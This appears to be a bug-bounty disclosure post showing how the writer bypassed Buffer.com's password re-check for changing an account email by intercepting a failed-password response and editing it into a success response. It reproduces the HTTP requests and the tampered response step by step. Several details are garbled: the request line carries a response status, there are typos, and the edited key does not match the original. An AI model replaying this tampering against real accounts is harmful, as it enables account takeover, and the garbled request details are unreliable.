Hi everyone , here is one of my finding on Buffer.com . Where i managed to bypass the authentication
So basically the authentication work flow is like below
- To change account email user need to provide the current account password
- If the password is correct then application let you to change the account email
So lets start
when user want to change their account email id the app ask for current password like below
so here i wanted to test the response for both correct and incorrect password response
so here is the request
*POST /account/set-sudomode HTTP/1.1 200 OK
Date: \*****
Host:buffer.com
User-Agent: Mozila/5.0
X-Request-With: XMLHttpRequest
csrf_token=uyr37832rhehr8&password=wrongpassword**
so the response for wrong password is below
*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close
{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8"}**
so here is the response for correct password
*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close
{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"Csrftoken"}**
if you observe both response just the notice_message and sudomode added in the correct password response
so here i used a wrong password let say 123456
Request is like below
*POST /account/set-sudomode HTTP/1.1 200 OK
Date: \*****
Host:buffer.com
User-Agent: Mozila/5.0
X-Request-With: XMLHttpRequest
csrf_token=uyr37832rhehr8he7372829hefdgdf&password=123456**
Note the csrf _token value in the request that is :
uyr37832rhehr8he7372829hefdgdf
Response
*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close
{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"**uyr37832rhehr8he7372829hefdgdf"}
Modify the response to
*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close
{"notice_message":"Great, we believe it's really you","sudome":"true","csrf_token":"**uyr37832rhehr8he7372829hefdgdf**"}
Boom now it will show successfully authenticated and you can change your email
So here is the video proof of concept